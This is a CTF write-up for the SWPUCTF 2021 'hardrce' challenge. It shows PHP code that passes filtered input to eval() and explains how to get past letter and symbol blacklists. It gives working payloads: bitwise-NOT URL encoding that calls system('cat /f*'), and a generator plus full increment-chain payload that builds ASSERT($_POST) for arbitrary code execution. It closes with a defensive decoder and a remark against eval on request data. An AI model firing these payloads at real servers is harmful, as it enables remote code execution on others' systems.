[SWPUCTF 2021 Freshman Contest] hardrce

Challenge

<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];
    foreach ($blacklist as $blackitem)
    {
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
        die("LTLT说不能用这些奇奇怪怪的符号哦!");
    }}
if(preg_match('/[a-zA-Z]/is',$wllm))
{
    die("Ra's Al Ghul说不能用字母哦!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
else
{
    echo "蔡总说:注意审题!!!";
}
?> 

Approach

Combine PHP's bitwise NOT (~) with URL encoding. The blacklist rejects letters and a list of symbols, but not ~, parentheses, the semicolon or the % of URL encoding. PHP applies ~ to a string byte by byte, so a string of inverted high bytes is turned back into the letters of a function name at runtime, and (~"...")(~"...") calls that function with the inverted argument.

EXP

1. Target command

system("cat /f*");

2. Encoding steps

Step 1: Split the command

Split the command into two parts:

  1. system

  2. cat /f*


Step 2: Bitwise NOT

Apply bitwise NOT to the ASCII value of every character (~byte, which equals 0xFF - byte).

  • Part 1: system


's' → 0x73 → ~0x73 = 0x8C
'y' → 0x79 → ~0x79 = 0x86
's' → 0x73 → ~0x73 = 0x8C
't' → 0x74 → ~0x74 = 0x8B
'e' → 0x65 → ~0x65 = 0x9A
'm' → 0x6D → ~0x6D = 0x92
Combined result: 0x8C, 0x86, 0x8C, 0x8B, 0x9A, 0x92
  • Part 2: cat /f*


'c' → 0x63 → ~0x63 = 0x9C
'a' → 0x61 → ~0x61 = 0x9E
't' → 0x74 → ~0x74 = 0x8B
' ' → 0x20 → ~0x20 = 0xDF
'/' → 0x2F → ~0x2F = 0xD0
'f' → 0x66 → ~0x66 = 0x99
'*' → 0x2A → ~0x2A = 0xD5
Combined result: 0x9C, 0x9E, 0x8B, 0xDF, 0xD0, 0x99, 0xD5

Step 3: URL-encode

Convert the inverted byte sequences into URL encoding:

  • Part 1: 0x8C, 0x86, 0x8C, 0x8B, 0x9A, 0x92 → %8C%86%8C%8B%9A%92

  • Part 2: 0x9C, 0x9E, 0x8B, 0xDF, 0xD0, 0x99, 0xD5 → %9C%9E%8B%DF%D0%99%D5


Step 4: Payload

Prefix each URL-encoded part with ~, wrap it in parentheses, put the two back to back (function name first, then its argument) and end the statement with a semicolon:

wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%D5);

Extension

<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\^','\~','\|'];
    foreach ($blacklist as $blackitem)
    {
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
        die("小伙子只会异或和取反?不好意思哦LTLT说不能用!!");
    }}
if(preg_match('/[a-zA-Z0-9]/is',$wllm))
{
    die("Ra'sAlGhul说用字母数字是没有灵魂的!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
else
{
    echo "蔡总说:注意审题!!!";
}
?> 

Here XOR and bitwise NOT are both filtered, so this variant has to be bypassed with the string auto-increment technique instead: PHP's ++ turns the string "A" into "B", and "Array"[0] (an array cast to string) yields the starting "A" without typing any letter.

EXP

<?php
// Generates the auto-increment payload: $_ is set to "A" (first character of "Array"),
// $__ is stepped with ++ to reach each wanted letter, and the letters are appended to
// $___ (becomes "ASSERT") and $____ (becomes "_POST").
$hack = "";
function addchar($char, $o) {
  global $hack;
  $hack.="\$__=\$_;";                       // reset $__ to "A"
  for ($i = ord('A'); $i < ord($char); ++$i) {
    $hack.="\$__++;";                       // step up to the wanted letter
  }
  $hack.=$o.".=\$__;";                      // append it to the target variable
}

$s1 = "ASSERT"; // built into $___ (three underscores)
$s2 = "POST";   // built into $____ (four underscores), after a leading "_"

// $_=[] ; "$_" stringifies to "Array" (warning suppressed by @) ; ['!'=='@'] is index 0 -> "A"
$hack.="\$_=[];\$_=@\"\$_\";\$_=\$_['!'=='@'];";

$hack.="\$___='';";
for ($i = 0; $i < strlen($s1); ++$i) {
  addchar($s1[$i], "\$___");
}
$hack.="\$____='_';";
for ($i = 0; $i < strlen($s2); ++$i) {
  addchar($s2[$i], "\$____");
}
$hack.="\$_=[];";
$hack.="\$___(\$\$____[_]);";               // ASSERT($_POST['_'])
// print($hack);
print(urlencode($hack));

Payload

GET request:
http://node7.anna.nssctf.cn:28713/?wllm=%24_%3D%5B%5D%3B%24_%3D%40%22%24_%22%3B%24_%3D%24_%5B%27!%27%3D%3D%27%40%27%5D%3B%24___%3D%24_%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24____%3D%27_%27%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B
%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24_%3D%24%24____%3B%24___(%24_%5B_%5D)%3B

POST request:
_=eval($_POST['xxx'])&xxx
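Both tricks on this page (the ~ encoding from the first challenge and the increment chain from the extension) are reversible without executing PHP, which is what an analyst triaging such requests in a web log needs. The following is an added example, not code from the writeup: it recovers the hidden function names and arguments from a URL-encoded wllm parameter. The two sample requests are constructed here from the page's own payloads; the helper names are assumptions.

```python
from __future__ import annotations
import re
from urllib.parse import quote, unquote_to_bytes

# Constructed sample requests. SAMPLE_NOT is the writeup's first payload verbatim;
# SAMPLE_INC is the increment payload rebuilt from the writeup's generator logic.
SAMPLE_NOT = "wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%D5);"
SAMPLE_INC = "wllm=" + quote(
    "$_=[];$_=@\"$_\";$_=$_['!'=='@'];$___=$_;$__=$_;" + "$__++;" * 18
    + "$___.=$__;$___.=$__;$__=$_;" + "$__++;" * 4 + "$___.=$__;$__=$_;"
    + "$__++;" * 17 + "$___.=$__;$__=$_;" + "$__++;" * 19 + "$___.=$__;"
    + "$____='_';$__=$_;" + "$__++;" * 15 + "$____.=$__;$__=$_;"
    + "$__++;" * 14 + "$____.=$__;$__=$_;" + "$__++;" * 18 + "$____.=$__;$__=$_;"
    + "$__++;" * 19 + "$____.=$__;$_=$$____;$___($_[_]);", safe="")

def param_bytes(query: str, name: str = "wllm") -> bytes:
    """Raw (URL-decoded) bytes of one query-string parameter, b'' if absent."""
    for part in query.split("&"):
        key, _, value = part.partition("=")
        if key == name:
            return unquote_to_bytes(value)
    return b""

def decode_bitwise_not(raw: bytes) -> list[str]:
    """Undo PHP's runtime ~ on a string: invert every byte inside each (~...) group."""
    return [bytes((~b) & 0xFF for b in m.group(1)).decode("latin-1")
            for m in re.finditer(rb"\(~([^()]*)\)", raw)]

def decode_increment(raw: bytes) -> dict[str, str]:
    """Replay the increment chain: $_ holds "A", $__=$_ resets, $__++ steps one
    letter (single-letter stepping assumed), $___.=$__ / $____.=$__ append it."""
    cur, built = "A", {}
    for stmt in raw.decode("latin-1").split(";"):
        if stmt == "$__=$_":
            cur = "A"
        elif stmt == "$__++":
            cur = chr(ord(cur) + 1)
        elif m := re.fullmatch(r"\$(_{3,})(\.?)=(\$__|\$_|'([^']*)')", stmt):
            name, append, rhs, lit = m.groups()
            val = cur if rhs == "$__" else "A" if rhs == "$_" else lit
            built[name] = (built.get(name, "") if append else "") + val
    return built

if __name__ == "__main__":
    print(decode_bitwise_not(param_bytes(SAMPLE_NOT)))   # ['system', 'cat /f*']
    print(decode_increment(param_bytes(SAMPLE_INC)))     # {'___': 'ASSERT', '____': '_POST'}
```

The real mitigation is not a longer blacklist, which both challenges show can be stepped around, but never passing request data to eval() at all.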
